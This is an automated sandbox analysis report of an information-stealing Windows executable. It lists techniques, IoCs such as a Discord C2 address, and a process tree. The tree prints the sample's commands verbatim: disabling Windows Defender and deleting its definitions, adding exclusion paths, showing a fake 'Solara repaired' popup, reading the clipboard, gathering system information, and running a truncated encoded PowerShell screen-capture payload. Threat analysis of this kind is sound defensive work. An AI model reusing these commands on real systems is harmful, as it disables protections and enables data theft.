e49a01639e630f9f9247550c503dc4798aa4221751e2b342c4ba942f356e9034

Analysis

max time kernel
432s
max time network
436s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
23/11/2024, 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
Size

6.0MB
MD5

b2fe874c2e11c56edf05c5250a8c966f
SHA1

06d6e28c3cb46e06195a5f8c360d8eeaddfb1c06
SHA256

255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f
SHA512

915ec47beaf9a572c135fe0ddcccf2bb18b6620dcaf9fc8069436e4fe8d3dce15424c3043b45668c7c4f81e513bb731d7bd310eacea6ea1e01cb019b1cc71b90
SSDEEP

98304:skEtdFBCm/I5NamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RxOnAKuP/ty/:szFIm/PeN/FJMIDJf0gsAGK4R0nAKuXq

Score

10^/10

collection defense_evasion discovery evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3488	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1792	powershell.exe
2424	powershell.exe
4484	powershell.exe
3952	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2544	cmd.exe
2020	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4252	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	discord.com
20	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4248	tasklist.exe
5044	tasklist.exe
3284	tasklist.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00280000000450da-21.dat	upx
behavioral1/memory/2148-25-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp	upx
behavioral1/files/0x00280000000450cd-27.dat	upx
behavioral1/memory/2148-30-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp	upx
behavioral1/files/0x00280000000450d8-29.dat	upx
behavioral1/files/0x00280000000450d7-33.dat	upx
behavioral1/files/0x00280000000450d4-47.dat	upx
behavioral1/memory/2148-48-0x00007FFD40460000-0x00007FFD4046F000-memory.dmp	upx
behavioral1/files/0x00280000000450d3-46.dat	upx
behavioral1/files/0x00280000000450d2-45.dat	upx
behavioral1/files/0x00280000000450d1-44.dat	upx
behavioral1/files/0x00280000000450d0-43.dat	upx
behavioral1/files/0x00280000000450cf-42.dat	upx
behavioral1/files/0x00280000000450ce-41.dat	upx
behavioral1/files/0x00280000000450cc-40.dat	upx
behavioral1/files/0x00280000000450df-39.dat	upx
behavioral1/files/0x00280000000450de-38.dat	upx
behavioral1/files/0x00280000000450dd-37.dat	upx
behavioral1/files/0x00280000000450d9-34.dat	upx
behavioral1/memory/2148-54-0x00007FFD38550000-0x00007FFD3857D000-memory.dmp	upx
behavioral1/memory/2148-56-0x00007FFD39D00000-0x00007FFD39D19000-memory.dmp	upx
behavioral1/memory/2148-58-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp	upx
behavioral1/memory/2148-60-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp	upx
behavioral1/memory/2148-62-0x00007FFD387D0000-0x00007FFD387E9000-memory.dmp	upx
behavioral1/memory/2148-64-0x00007FFD3AEA0000-0x00007FFD3AEAD000-memory.dmp	upx
behavioral1/memory/2148-66-0x00007FFD387A0000-0x00007FFD387CE000-memory.dmp	upx
behavioral1/memory/2148-68-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp	upx
behavioral1/memory/2148-73-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp	upx
behavioral1/memory/2148-72-0x00007FFD28F30000-0x00007FFD292A5000-memory.dmp	upx
behavioral1/memory/2148-71-0x00007FFD292B0000-0x00007FFD29368000-memory.dmp	upx
behavioral1/memory/2148-76-0x00007FFD38780000-0x00007FFD38794000-memory.dmp	upx
behavioral1/memory/2148-79-0x00007FFD3A070000-0x00007FFD3A07D000-memory.dmp	upx
behavioral1/memory/2148-84-0x00007FFD28E10000-0x00007FFD28F28000-memory.dmp	upx
behavioral1/memory/2148-83-0x00007FFD39D00000-0x00007FFD39D19000-memory.dmp	upx
behavioral1/memory/2148-78-0x00007FFD38550000-0x00007FFD3857D000-memory.dmp	upx
behavioral1/memory/2148-85-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp	upx
behavioral1/memory/2148-87-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp	upx
behavioral1/memory/2148-110-0x00007FFD387D0000-0x00007FFD387E9000-memory.dmp	upx
behavioral1/memory/2148-120-0x00007FFD3AEA0000-0x00007FFD3AEAD000-memory.dmp	upx
behavioral1/memory/2148-140-0x00007FFD292B0000-0x00007FFD29368000-memory.dmp	upx
behavioral1/memory/2148-139-0x00007FFD387A0000-0x00007FFD387CE000-memory.dmp	upx
behavioral1/memory/2148-185-0x00007FFD28F30000-0x00007FFD292A5000-memory.dmp	upx
behavioral1/memory/2148-217-0x00007FFD28E10000-0x00007FFD28F28000-memory.dmp	upx
behavioral1/memory/2148-236-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp	upx
behavioral1/memory/2148-235-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp	upx
behavioral1/memory/2148-231-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp	upx
behavioral1/memory/2148-230-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp	upx
behavioral1/memory/2148-265-0x00007FFD387F0000-0x00007FFD3880F000-memory.dmp	upx
behavioral1/memory/2148-273-0x00007FFD28E10000-0x00007FFD28F28000-memory.dmp	upx
behavioral1/memory/2148-272-0x00007FFD3A070000-0x00007FFD3A07D000-memory.dmp	upx
behavioral1/memory/2148-271-0x00007FFD38780000-0x00007FFD38794000-memory.dmp	upx
behavioral1/memory/2148-270-0x00007FFD28F30000-0x00007FFD292A5000-memory.dmp	upx
behavioral1/memory/2148-269-0x00007FFD387A0000-0x00007FFD387CE000-memory.dmp	upx
behavioral1/memory/2148-268-0x00007FFD3AEA0000-0x00007FFD3AEAD000-memory.dmp	upx
behavioral1/memory/2148-267-0x00007FFD387D0000-0x00007FFD387E9000-memory.dmp	upx
behavioral1/memory/2148-266-0x00007FFD299E0000-0x00007FFD29B51000-memory.dmp	upx
behavioral1/memory/2148-264-0x00007FFD39D00000-0x00007FFD39D19000-memory.dmp	upx
behavioral1/memory/2148-263-0x00007FFD38550000-0x00007FFD3857D000-memory.dmp	upx
behavioral1/memory/2148-262-0x00007FFD40460000-0x00007FFD4046F000-memory.dmp	upx
behavioral1/memory/2148-261-0x00007FFD3AEB0000-0x00007FFD3AED4000-memory.dmp	upx
behavioral1/memory/2148-260-0x00007FFD29B60000-0x00007FFD29FCE000-memory.dmp	upx
behavioral1/memory/2148-255-0x00007FFD292B0000-0x00007FFD29368000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4764	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3300	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
1792	powershell.exe
1792	powershell.exe
3952	powershell.exe
4484	powershell.exe
3952	powershell.exe
3952	powershell.exe
4484	powershell.exe
4484	powershell.exe
2500	WMIC.exe
2500	WMIC.exe
2500	WMIC.exe
2500	WMIC.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe
2672	powershell.exe
2672	powershell.exe
2672	powershell.exe
968	WMIC.exe
968	WMIC.exe
968	WMIC.exe
968	WMIC.exe
3592	WMIC.exe
3592	WMIC.exe
3592	WMIC.exe
3592	WMIC.exe
3784	WMIC.exe
3784	WMIC.exe
3784	WMIC.exe
3784	WMIC.exe
4764	WMIC.exe
4764	WMIC.exe
4764	WMIC.exe
4764	WMIC.exe
3960	powershell.exe
3960	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	5044	tasklist.exe
Token: SeDebugPrivilege	3284	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1792	powershell.exe
Token: SeSecurityPrivilege	1792	powershell.exe
Token: SeTakeOwnershipPrivilege	1792	powershell.exe
Token: SeLoadDriverPrivilege	1792	powershell.exe
Token: SeSystemProfilePrivilege	1792	powershell.exe
Token: SeSystemtimePrivilege	1792	powershell.exe
Token: SeProfSingleProcessPrivilege	1792	powershell.exe
Token: SeIncBasePriorityPrivilege	1792	powershell.exe
Token: SeCreatePagefilePrivilege	1792	powershell.exe
Token: SeBackupPrivilege	1792	powershell.exe
Token: SeRestorePrivilege	1792	powershell.exe
Token: SeShutdownPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeSystemEnvironmentPrivilege	1792	powershell.exe
Token: SeRemoteShutdownPrivilege	1792	powershell.exe
Token: SeUndockPrivilege	1792	powershell.exe
Token: SeManageVolumePrivilege	1792	powershell.exe
Token: 33	1792	powershell.exe
Token: 34	1792	powershell.exe
Token: 35	1792	powershell.exe
Token: 36	1792	powershell.exe
Token: SeIncreaseQuotaPrivilege	2500	WMIC.exe
Token: SeSecurityPrivilege	2500	WMIC.exe
Token: SeTakeOwnershipPrivilege	2500	WMIC.exe
Token: SeLoadDriverPrivilege	2500	WMIC.exe
Token: SeSystemProfilePrivilege	2500	WMIC.exe
Token: SeSystemtimePrivilege	2500	WMIC.exe
Token: SeProfSingleProcessPrivilege	2500	WMIC.exe
Token: SeIncBasePriorityPrivilege	2500	WMIC.exe
Token: SeCreatePagefilePrivilege	2500	WMIC.exe
Token: SeBackupPrivilege	2500	WMIC.exe
Token: SeRestorePrivilege	2500	WMIC.exe
Token: SeShutdownPrivilege	2500	WMIC.exe
Token: SeDebugPrivilege	2500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2500	WMIC.exe
Token: SeRemoteShutdownPrivilege	2500	WMIC.exe
Token: SeUndockPrivilege	2500	WMIC.exe
Token: SeManageVolumePrivilege	2500	WMIC.exe
Token: 33	2500	WMIC.exe
Token: 34	2500	WMIC.exe
Token: 35	2500	WMIC.exe
Token: 36	2500	WMIC.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	4248	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2500	WMIC.exe
Token: SeSecurityPrivilege	2500	WMIC.exe
Token: SeTakeOwnershipPrivilege	2500	WMIC.exe
Token: SeLoadDriverPrivilege	2500	WMIC.exe
Token: SeSystemProfilePrivilege	2500	WMIC.exe
Token: SeSystemtimePrivilege	2500	WMIC.exe
Token: SeProfSingleProcessPrivilege	2500	WMIC.exe
Token: SeIncBasePriorityPrivilege	2500	WMIC.exe
Token: SeCreatePagefilePrivilege	2500	WMIC.exe
Token: SeBackupPrivilege	2500	WMIC.exe
Token: SeRestorePrivilege	2500	WMIC.exe
Token: SeShutdownPrivilege	2500	WMIC.exe
Token: SeDebugPrivilege	2500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2500	WMIC.exe
Token: SeRemoteShutdownPrivilege	2500	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4388	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2148	2780	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	80
PID 2780 wrote to memory of 2148	2780	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	80
PID 2148 wrote to memory of 996	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	81
PID 2148 wrote to memory of 996	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	81
PID 2148 wrote to memory of 2932	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	82
PID 2148 wrote to memory of 2932	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	82
PID 2148 wrote to memory of 2512	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	84
PID 2148 wrote to memory of 2512	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	84
PID 2148 wrote to memory of 2088	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	87
PID 2148 wrote to memory of 2088	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	87
PID 2932 wrote to memory of 1792	2932	cmd.exe	89
PID 2932 wrote to memory of 1792	2932	cmd.exe	89
PID 2512 wrote to memory of 4388	2512	cmd.exe	90
PID 2512 wrote to memory of 4388	2512	cmd.exe	90
PID 996 wrote to memory of 4484	996	cmd.exe	91
PID 996 wrote to memory of 4484	996	cmd.exe	91
PID 2088 wrote to memory of 3952	2088	cmd.exe	92
PID 2088 wrote to memory of 3952	2088	cmd.exe	92
PID 2148 wrote to memory of 3740	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	93
PID 2148 wrote to memory of 3740	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	93
PID 2148 wrote to memory of 1404	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	94
PID 2148 wrote to memory of 1404	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	94
PID 2148 wrote to memory of 5056	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	97
PID 2148 wrote to memory of 5056	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	97
PID 2148 wrote to memory of 2544	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	98
PID 2148 wrote to memory of 2544	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	98
PID 2148 wrote to memory of 3224	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	100
PID 2148 wrote to memory of 3224	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	100
PID 1404 wrote to memory of 5044	1404	cmd.exe	101
PID 1404 wrote to memory of 5044	1404	cmd.exe	101
PID 2148 wrote to memory of 1080	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	134
PID 2148 wrote to memory of 1080	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	134
PID 2148 wrote to memory of 1264	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	106
PID 2148 wrote to memory of 1264	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	106
PID 3740 wrote to memory of 3284	3740	cmd.exe	107
PID 3740 wrote to memory of 3284	3740	cmd.exe	107
PID 2148 wrote to memory of 524	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	109
PID 2148 wrote to memory of 524	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	109
PID 5056 wrote to memory of 2500	5056	cmd.exe	111
PID 5056 wrote to memory of 2500	5056	cmd.exe	111
PID 2544 wrote to memory of 2020	2544	cmd.exe	112
PID 2544 wrote to memory of 2020	2544	cmd.exe	112
PID 3224 wrote to memory of 4248	3224	cmd.exe	114
PID 3224 wrote to memory of 4248	3224	cmd.exe	114
PID 1264 wrote to memory of 3300	1264	cmd.exe	115
PID 1264 wrote to memory of 3300	1264	cmd.exe	115
PID 1080 wrote to memory of 1808	1080	cmd.exe	116
PID 1080 wrote to memory of 1808	1080	cmd.exe	116
PID 524 wrote to memory of 2672	524	cmd.exe	117
PID 524 wrote to memory of 2672	524	cmd.exe	117
PID 2148 wrote to memory of 1148	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	119
PID 2148 wrote to memory of 1148	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	119
PID 1148 wrote to memory of 4200	1148	cmd.exe	121
PID 1148 wrote to memory of 4200	1148	cmd.exe	121
PID 2148 wrote to memory of 2692	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	122
PID 2148 wrote to memory of 2692	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	122
PID 2692 wrote to memory of 2224	2692	cmd.exe	153
PID 2692 wrote to memory of 2224	2692	cmd.exe	153
PID 2672 wrote to memory of 1820	2672	powershell.exe	124
PID 2672 wrote to memory of 1820	2672	powershell.exe	124
PID 2148 wrote to memory of 2588	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	126
PID 2148 wrote to memory of 2588	2148	255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe	126
PID 2588 wrote to memory of 4808	2588	cmd.exe	128
PID 2588 wrote to memory of 4808	2588	cmd.exe	128

C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
"C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
  "C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1792
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3740
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA